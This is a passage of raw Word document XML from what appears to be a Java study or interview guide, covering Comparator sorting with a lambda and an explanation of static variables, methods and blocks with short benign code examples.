        <w:t xml:space="preserve"> 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644D8DC" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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48957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Natural order by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4026B2" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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48957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786D926" w14:textId="7A45183E" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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489570"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444884D4" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FB468F" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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711461"/>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NameComparat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mplement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omparator</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udent</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ACEBF28" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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71146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compare</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udent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> s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udent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> s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88827E5" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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71146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s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mpareT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ustom order by name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6F1ECE" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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71146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90427BC" w14:textId="03546123" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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711461"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA1FD25" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8+ Lambda Comparator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F66460" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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1608647"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Comparator</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udent</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nameComparato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s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mpareT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ame</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F9039" w14:textId="55D329A7" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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1608647"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Collection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or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udent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Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5031E7" w14:textId="20F1E235" w:rsidR="00B7737D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="3FDC7690">
          <v:rect id="_x0000_i1108" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D9CE3A" w14:textId="72A89C82" w:rsidR="00B45D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00B45D48">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc196307503"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is static in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="26C94D34" w14:textId="25F31B18" w:rsidR="00B45D48" w:rsidRPr="00CE4B95" w:rsidRDefault="000B3FA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> is a modifier that can be applied to variables, methods, blocks, and nested classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4C2F5B" w14:textId="77777777" w:rsidR="0014432F" w:rsidRPr="00CE4B95" w:rsidRDefault="0014432F" w:rsidP="0014432F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static Variable (Class Variable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C18CE7" w14:textId="77777777" w:rsidR="0014432F" w:rsidRPr="00CE4B95" w:rsidRDefault="0014432F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Belongs to the class rather than any object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60474166" w14:textId="77777777" w:rsidR="0014432F" w:rsidRPr="00CE4B95" w:rsidRDefault="0014432F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Shared by all instances of the class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4CAD6" w14:textId="77777777" w:rsidR="0014432F" w:rsidRPr="00CE4B95" w:rsidRDefault="0014432F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Initialized when class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1BB949" w14:textId="77777777" w:rsidR="00C06BDA" w:rsidRPr="00CE4B95" w:rsidRDefault="00C06BDA" w:rsidP="00C06BDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60750D1E" w14:textId="77777777" w:rsidR="005F0FE0" w:rsidRPr="00CE4B95" w:rsidRDefault="005F0F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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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Counter</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05851F74" w14:textId="77777777" w:rsidR="005F0FE0" w:rsidRPr="00CE4B95" w:rsidRDefault="005F0F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stat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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> count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0</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static variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1459AA" w14:textId="77777777" w:rsidR="005F0FE0" w:rsidRPr="00CE4B95" w:rsidRDefault="005F0F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2AC0B543" w14:textId="77777777" w:rsidR="005F0FE0" w:rsidRPr="00CE4B95" w:rsidRDefault="005F0F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Counter</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3DF69166" w14:textId="77777777" w:rsidR="005F0FE0" w:rsidRPr="00CE4B95" w:rsidRDefault="005F0F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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734C987" w14:textId="77777777" w:rsidR="005F0FE0" w:rsidRPr="00CE4B95" w:rsidRDefault="005F0F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5D44057C" w14:textId="75D0384A" w:rsidR="00392F44" w:rsidRPr="00CE4B95" w:rsidRDefault="005F0FE0" w:rsidP="00EF23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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EAB0D3" w14:textId="77777777" w:rsidR="00EF2376" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF2376" w:rsidP="00EF2376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8E4AD1" w14:textId="77777777" w:rsidR="00EF2376" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF2376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Belongs to the class rather than instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D92EA9" w14:textId="77777777" w:rsidR="00EF2376" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF2376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Can be called without creating an object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DFD11A" w14:textId="77777777" w:rsidR="00EF2376" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF2376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Can only access static members directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CB288" w14:textId="77777777" w:rsidR="00551BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00551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291543"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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MathUtil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6509CE2A" w14:textId="77777777" w:rsidR="00551BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00551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2915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stat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add</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</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static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44371B64" w14:textId="77777777" w:rsidR="00551BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00551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2915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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122B37B" w14:textId="77777777" w:rsidR="00551BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00551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291543"/>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3696FBC1" w14:textId="63B7EA70" w:rsidR="00551BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00551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291543"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F22348" w14:textId="2612DC44" w:rsidR="00551BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00551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291543"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Usage: MathUtils.add(5, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530F363" w14:textId="4256867A" w:rsidR="006A6A9D" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6A9D" w:rsidP="006A6A9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static Block:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5E50B" w14:textId="77777777" w:rsidR="006A6A9D" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6A9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used for static initialization of a class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3160CD29" w14:textId="77777777" w:rsidR="006A6A9D" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6A9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executed when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B5340" w14:textId="77777777" w:rsidR="00382D2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00382D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929988"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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My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46656823" w14:textId="77777777" w:rsidR="00382D2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00382D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9299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stat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3B58CECC" w14:textId="77777777" w:rsidR="00382D2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00382D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9299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Static block executed"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590237E8" w14:textId="77777777" w:rsidR="00382D2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00382D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9299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1DBC4E52" w14:textId="4B3A147F" w:rsidR="00382D2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00382D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929988"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB1A6F" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95" w:rsidRDefault="00D277B0" w:rsidP="00D277B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
